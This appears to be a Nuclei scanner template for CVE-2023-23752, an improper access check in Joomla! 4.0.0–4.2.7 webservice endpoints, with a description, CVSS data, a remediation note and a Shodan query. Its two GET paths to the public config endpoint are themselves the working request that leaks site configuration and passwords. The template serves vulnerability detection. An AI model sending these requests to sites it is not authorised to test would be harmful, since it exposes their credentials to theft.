60 lines
2.0 KiB
YAML
60 lines
2.0 KiB
YAML
id: CVE-2023-23752
|
|
|
|
info:
|
|
name: Joomla! Webservice - Password Disclosure
|
|
author: badboycxcc,Sascha Brendel
|
|
severity: medium
|
|
description: |
|
|
An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.
|
|
impact: |
|
|
The vulnerability can lead to unauthorized access to user passwords, compromising the confidentiality of user accounts.
|
|
remediation: Upgrade to Joomla! version 4.2.8 or later.
|
|
reference:
|
|
- https://unsafe.sh/go-149780.html
|
|
- https://twitter.com/gov_hack/status/1626471960141238272/photo/1
|
|
- https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-23552
|
|
- https://github.com/20142995/pocsuite3
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2023-23752
|
|
epss-score: 0.96314
|
|
epss-percentile: 0.9944
|
|
cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: joomla
|
|
product: joomla\!
|
|
shodan-query: html:"Joomla! - Open Source Content Management"
|
|
tags: cve,cve2023,joomla,kev
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/api/index.php/v1/config/application?public=true'
|
|
- '{{BaseURL}}/api/v1/config/application?public=true'
|
|
|
|
stop-at-first-match: true
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"links":'
|
|
- '"attributes":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
- 'application/vnd.api+json'
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100f1a8859b2be34845c6e9ff983c9ab9fc1741ee2e59af7319158de1e37c2002850221009b6444bdf0c4f9f9c9da30901088c17b893d690461a859cb5a97e2488a963ce2:922c64590222798bb761d5b6d8e72950 |